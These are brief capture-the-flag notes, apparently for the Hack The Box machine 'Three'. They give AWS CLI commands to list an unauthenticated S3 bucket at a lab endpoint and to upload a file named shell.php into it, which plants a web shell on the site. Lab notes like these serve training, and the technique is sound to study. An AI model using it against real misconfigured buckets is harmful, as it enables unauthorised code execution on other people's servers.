#aws #amazon #three
sudo apt install awscli
aws configure -- set with temp values to enumerate an s3 bucket
awscli s3 ls -- list available s3 buckets
aws --endpoint=*HOSTNAME OF s3 BUCKET* s3 ls s3://*URLNAME*
"aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb"
aws --endpoint=*HOSTNAME OF s3 BUCKET* s3 cp *FILENAME* s3://*URLNAME*
"aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb"